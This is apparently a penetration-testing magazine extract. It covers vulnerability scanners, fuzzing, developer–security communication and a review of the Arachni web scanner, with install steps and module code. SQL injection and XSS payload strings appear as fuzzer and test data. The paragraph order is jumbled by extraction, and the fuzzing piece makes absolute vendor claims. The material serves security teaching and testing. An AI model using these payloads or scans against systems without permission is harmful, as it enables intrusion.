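# service is reachable, anything else is reported as closed/filtered.
def scan_ports(host, ports, timeout_s = 0.5)
  ports.each_with_object({}) do |port, results|
    results[port] =
      begin
        Timeout.timeout(timeout_s) { TCPSocket.new(host, port).close }
        :open
      rescue StandardError
        :closed
      end
  end
end
```

A real port scanner layers UDP probes, OS fingerprinting and IDS-evasion timing on top of this basic idea.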
Vulnerability Scanners

While port scanners only produce an inventory of the types of available services, vulnerability scanners attempt to exercise vulnerabilities on their targeted systems. The main goal of vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most of the commercial and open source scanners scan the operating system for known weaknesses and un-patched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help in a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard or Core Impact.
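The database-driven matching these scanners perform can be reduced to a simple lookup from the service inventory into a defect catalogue. The entries below are invented for the example (real scanners ship databases of thousands of documented defects):

```ruby
# Toy defect database keyed by service banner; the banners and findings
# here are made up purely for illustration.
DEFECT_DB = {
  'OpenSSH/4.3'  => ['example: auth bypass advisory'],
  'Apache/2.2.3' => ['example: mod_rewrite off-by-one advisory']
}.freeze

# Match a port => banner inventory (as produced by a port scanner)
# against the defect database, returning findings per port.
def match_defects(inventory)
  inventory.each_with_object({}) do |(port, banner), findings|
    hits = DEFECT_DB[banner]
    findings[port] = hits if hits
  end
end
```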
Application Scanners

Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxy

Assessment proxies work by interposing themselves between the web browser used by the testers and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks to exercise the application's weaknesses and its associated components. For example, penetration testers can view all cookies, hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application.
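The core trick — intercept a form submission, change a field the browser would never let you edit, then forward it — can be sketched with the standard library. The field names below are invented for the example:

```ruby
require 'uri'

# What an assessment proxy does with an intercepted form body:
# decode it, tamper with one parameter, re-encode and forward.
def tamper_form_body(body, field, new_value)
  params = URI.decode_www_form(body).to_h
  params[field] = new_value
  URI.encode_www_form(params)
end
```

For instance, a tester might rewrite a hidden `price` field before the request reaches the server to check whether the application trusts client-supplied values.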
The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform the penetration testing practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of the results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, which can be used as a feedback and reporting feature of the test results.
• Extensibility – The tool can be customized; it must provide scripting language or plug-in capabilities that can be used to construct customized penetration tests.
• Configurability – A tool that is configurable is highly recommended, to ensure the flexibility of the implementation process.
• Documentation – The tool should provide the right documentation, with clear explanations of the probes performed during the penetration testing.
• License Flexibility – A tool that has the flexibility of use without specific constraints, such as a particular IP range or license limits, is a better tool than others.
Security Techniques for Web Apps

Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data that is sent by the browser can never be trusted (e.g. submitted form data, uploaded files, cookies, XML data, etc.). If web developers fail to sanitize the incoming data, it might lead to vulnerabilities such as SQL injection, cross-site scripting and other attacks against the web application.
• Validate data before form submission and manage sessions – This avoids Cross Site Request Forgery (CSRF), which can occur when a web application accepts form submission data without verifying that it came from a user web form. It is imperative for the web application to verify that the user form is the one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow guidelines for hardening web servers. Some of these guidelines are: maintain and apply proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (the Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.
In addition to the above guidelines, it is always important to enforce strong passwords for web application users and to protect stored passwords.
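The first two guidelines above can be sketched in a few lines of Ruby. This is a minimal illustration under our own assumptions (the field format, the HMAC construction and all names are ours, not a prescribed standard):

```ruby
require 'openssl'
require 'securerandom'

SECRET = SecureRandom.hex(32) # per-deployment secret (illustrative)

# Whitelist validation: accept only known-good input instead of
# trying to strip out every dangerous character.
def valid_username?(input)
  input.match?(/\A[A-Za-z0-9_]{3,20}\z/)
end

# Tie an anti-CSRF token to the session, so only forms the application
# itself served will carry a verifiable token on submission.
def csrf_token(session_id)
  OpenSSL::HMAC.hexdigest('SHA256', SECRET, session_id)
end

def valid_csrf?(session_id, token)
  # Use a constant-time comparison in production code.
  csrf_token(session_id) == token
end
```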
Conclusion

A vulnerability assessment is the process of identifying, prioritizing, quantifying and ranking the vulnerabilities in a system; such a process determines whether there is a weakness or vulnerability in the system subjected to the assessment. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of the vulnerabilities found in the discovery phase.
Unfortunately, an all-clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools continue to mature, automated security assessment will keep reducing both the uncertainty of determination (i.e. false positive results) and the potential to miss some issues (i.e. false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools can't entirely replace manual penetration testing. However, if automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment the automated results, covering the logical vulnerabilities that automated testing misses.
Finally, it is important to point out that, over time, manual testing for technical vulnerabilities will move from difficult to impossible as the size, scope and complexity of web applications increase. The fact that many enterprise organizations will not be able to dedicate the time, money and effort required to assess thousands of web applications will increase the use of automated tools rather than relying on humans to manually test these applications. Also, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error and simply can't be trusted at that scale.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science, and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases: When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation: All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers, so that they can start developing a fix for the found issues.
MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts: Proprietary test scripts are not rewritten even though the communication interfaces change, or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box: If the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution: random fuzzing. Test requirements should instead focus on coverage metrics, to ensure that testing aims to find most flaws in the software.
Using hardware test beds: Appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you wherever testing is needed, and are not locked to a physical test lab.
Unprepared for cloud: A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups, where you can easily copy the setup to your colleagues or upload it to cloud environments.
PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer? What are the qualities that a fuzzing tool should have?
Model-based test suites: Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use: Most fuzzers are built for security experts, but in QA you cannot expect all testers to understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need domain expertise in the target system to execute tests.
Automated: Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
Test coverage: Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable: Time is almost always an issue when it comes to testing, and the user must have control over fuzzing parameters such as test coverage. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can spend more time in testing and can select other test completion criteria.
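The model-based, automated generation described above can be sketched very compactly: start from one valid message (the model) and emit variants with one field at a time replaced by an anomaly. The anomaly list here is a tiny hand-picked sample; real fuzzers derive far richer anomaly sets from protocol models:

```ruby
# A few classic anomalies: empty value, overlong string, format string,
# embedded NULs, SQL metacharacters. Chosen for illustration only.
ANOMALIES = ['', 'A' * 5000, '%n%n%n%n', "\x00\x00", "' OR '1'='1"].freeze

# Generate one test case per (field, anomaly) pair from a valid sample.
def fuzz_cases(valid_message)
  valid_message.keys.flat_map do |field|
    ANOMALIES.map { |anomaly| valid_message.merge(field => anomaly) }
  end
end
```

Each generated case differs from the valid sample in exactly one field, which keeps failures easy to attribute and document.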
Application Security members are considered like the tax man asking for money; security is sometimes seen as a cost to pay in order to get an application into production. Actually, it is a little of everyone's fault. Since security people and developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve.

Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: the Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign for the new product line. Marketers might ask the developers something like Give us the latest Web 2.0, social-enabled website, or something like that, to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep.

The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more. Security is slowly pushed aside so that coding and production can meet the deadline. Most software architecture is not designed with security in mind, and project Gantt charts usually include no security checkpoints for code testing, nor do they allow time for security fixes or remediation.
Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment, when someone recalls something about security: Hey, we need to get this on-line, so we need to open up the firewall to allow access to it.
The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that management has imposed on them.
On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?
One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom. For example, the report might have statements like a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before utilization. The report does not contain all
Developers are from Venus, Application Security guys are from Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
but which is the right one to use to ensure secure code development?
.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
The requested effort is minimal compared to translating an implement a filter policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach. The security team and the application developers are now on the same page, and everyone is happy.

There is a third approach that I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write most test beds using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected.

The idea is straightforward. Using the WAPT activity, instead of an implement a filtering policy statement, you will produce a set of rspec/cucumber scenarios modeling how the source code must deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases; when testing is complete and all tests pass, it will mean your source code has implemented a filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed input and why it is so important to the Application Security group.
In the next article we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
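The BDD workflow described above can be sketched without any framework at all (a real project would use RSpec or Cucumber): each scenario states how the filter must treat a malformed input, and the code is corrected until every scenario passes. The filter and the scenarios below are invented, naive examples, not production-grade sanitization:

```ruby
# Naive illustrative filter: strip characters commonly abused in XSS
# payloads. A real policy would be context-aware output encoding.
def filter_input(value)
  value.gsub(/[<>"']/, '')
end

# Each scenario: a description, a malformed input, the required output.
SCENARIOS = [
  ['strips angle brackets', '<script>alert(1)</script>', 'scriptalert(1)/script'],
  ['leaves plain text alone', 'hello world', 'hello world'],
  ['strips quotes', %q{" onload="evil()}, ' onload=evil()']
].freeze

# Run every scenario and report [name, passed?] pairs, rspec-style.
def run_scenarios
  SCENARIOS.map { |name, input, expected| [name, filter_input(input) == expected] }
end
```

When a scenario fails, the developer fixes `filter_input` and re-runs; once all scenarios pass, the filtering policy is demonstrably implemented.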
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem arises when the two groups talk to each other at the end of the whole process: they use a non-common-ground language that further confuses or annoys everyone and pushes the groups further apart.
Communications Breakdown: You Give Me The Report

Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information with which to pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.
Security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by the OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. They want to know the module, class or line where the problem exists, so that they can fix it. Given enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still get the application into production.
Let's Close the Gap

What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved in two ways:
• Create a development framework that has security built into it
• Design an API to be used by the application
Putting security into the framework is the Rails approach. Rails' developers added security facilities inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works when a programming language has a secure framework for developing web applications. This is true for the Ruby community (other frameworks, like Sinatra, have some security facilities as well). In the Java programming language community there are a lot of non-standardized frameworks available for Java developers.
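The kind of output filtering Rails bakes into its helpers (and that ESAPI exposes as explicit API calls) ultimately boils down to HTML-escaping, which the Ruby standard library also provides. A minimal sketch with stdlib CGI, not the Rails helper itself:

```ruby
require 'cgi'

# A framework helper escapes untrusted output before it reaches the page,
# so an injected payload renders as inert text instead of executing.
payload = '<script>alert("xss")</script>'
escaped = CGI.escapeHTML(payload)
```

Because the framework applies this transparently, each individual developer does not have to remember to re-implement it at every output point.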
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He's interested in code review and he's working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar and practicing the Tae kwon-do ITF martial art. He's a husband and a daddy, and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). These tools are really meant to be used by a skilled consultant doing manual investigations of the application.

Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction from the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset, and must choose the best combination of tools for the job at hand. Is Arachni worthwhile?
Time for an in-depth review
Under the Hood

According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view.
• A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details.
Pulling the Legs of Arachni

Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1: Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags
Recon Modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).

This is great if you want to speed up the scan, or if you want to execute some crazy things like running
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients, and multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.
At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler always runs at the start of the scan. The crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
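The crawler's scope rules can be modelled as include/exclude regular expressions plus a link-count cap. A minimal sketch of the idea (the patterns, limit and function names below are our own, not Arachni's internals):

```ruby
# A URL is in scope when it matches the include pattern and does not
# match the exclude pattern.
def in_scope?(url, include_re, exclude_re)
  url.match?(include_re) && !url.match?(exclude_re)
end

# Apply scope filtering to discovered links and cap the total link count.
def select_links(urls, include_re, exclude_re, limit)
  urls.select { |u| in_scope?(u, include_re, exclude_re) }.first(limit)
end
```

Excluding URLs such as logout links is important in practice, because crawling them would terminate the authenticated session mid-scan.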
The HTML parser can extract forms, links, cookies and headers. It can graciously handle badly written HTML thanks to a combination of regular expression analysis and the Nokogiri HTML parser.
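Arachni pairs its regexes with Nokogiri; the same extraction idea can be shown with the standard library's REXML on well-formed markup (a stdlib-only sketch, not Arachni's actual parsing code):

```ruby
require 'rexml/document'

# Walk every <input> inside every <form> and collect its name and type,
# the raw material an audit module needs to build attack requests.
def extract_form_inputs(html)
  doc = REXML::Document.new(html)
  fields = []
  doc.elements.each('//form//input') do |input|
    fields << { name: input.attributes['name'], type: input.attributes['type'] }
  end
  fields
end
```

Nokogiri does the same job while also tolerating the malformed HTML that real sites serve, which is why Arachni uses it.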
Arachni offers a very simple and easy-to-use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.
Arachni also offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.
Installation

Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
Table 2: Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.
Plug-ins:
• Passive Proxy – Analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit.
• Form-based AutoLogin – Performs an automated login.
• Dictionary attacker – Performs dictionary attacks against HTTP authentication and form-based authentication.
• Profiler – Performs taint analysis with benign inputs and response time analysis.
• Cookie collector – Keeps track of cookies while establishing a timeline of the changes.
• Healthmap – Generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL.
• Content-types – Logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files.
• WAF (Web Application Firewall) Detector – Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes.
• Metamodules – Loads and runs high-level meta-analysis modules pre/mid/post-scan:
  • AutoThrottle – Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization.
  • TimeoutNotice – Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing.
  • Uniformity – Reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization.
your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run it natively in Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux

Installation under Linux is quite straightforward. Open your favourite shell and execute the commands from Listing 1.
This will install all source directories in your home directory; change the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows

Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3, some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1: Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2: Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades; in any case, an upgrade of Cygwin usually requires recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:

$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note: these are the same commands as with the Linux installation); see Listing 2.
In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:

$ find /usr/local -iname '*.so' > /tmp/localso.lst

Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right click ash.exe and choose Run as administrator. Enter in ash:

$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst

Exit ash.
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command-line.
The GUI can be started by executing the following commands:
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers. The dispatcher(s) will run the actual scan.
Figure 1 Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):

• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of what issues are detected and how far the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi), Cross-Site Request Forgery (CSRF), or detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and enable you to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks...
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories...
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
  • Tutorial: serves as an example
  • Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI
Your First Scan
We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:

$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:

$ arachni --mods=*,-xss_* http://www.example.com

The above will load all modules except the modules related to Cross-Site Scripting (XSS).
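For readers who want to see the idea behind such a switch, the include/exclude behaviour can be sketched in a few lines of Ruby. This is an illustrative toy, not Arachni's actual implementation; the function name and the glob-style matching are my own choices:

```ruby
# Illustrative sketch (not Arachni's real code): a --mods style filter
# where glob patterns select module names and a leading dash excludes.
def filter_modules(available, patterns)
  include_pats = patterns.reject { |p| p.start_with?('-') }
  exclude_pats = patterns.select { |p| p.start_with?('-') }.map { |p| p[1..-1] }

  available.select { |name| include_pats.any? { |pat| File.fnmatch(pat, name) } }
           .reject { |name| exclude_pats.any? { |pat| File.fnmatch(pat, name) } }
end

mods = %w[xss_path xss_uri sqli csrf code_injection]
puts filter_modules(mods, ['*', '-xss_*']).inspect
# => ["sqli", "csrf", "code_injection"]
```

The same pattern (select on inclusion globs, then reject on exclusion globs) generalizes to any scanner that lets you whittle down a module list.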
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
Next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for the list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.

Figure 2 Start a scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos
                          <tasos.laskos@gmail.com>

  This is free software; you can copy and distribute and modify
  this program under the term of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists
# generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited     ||= Set.new
        @@__directories ||= []

        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run( )
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
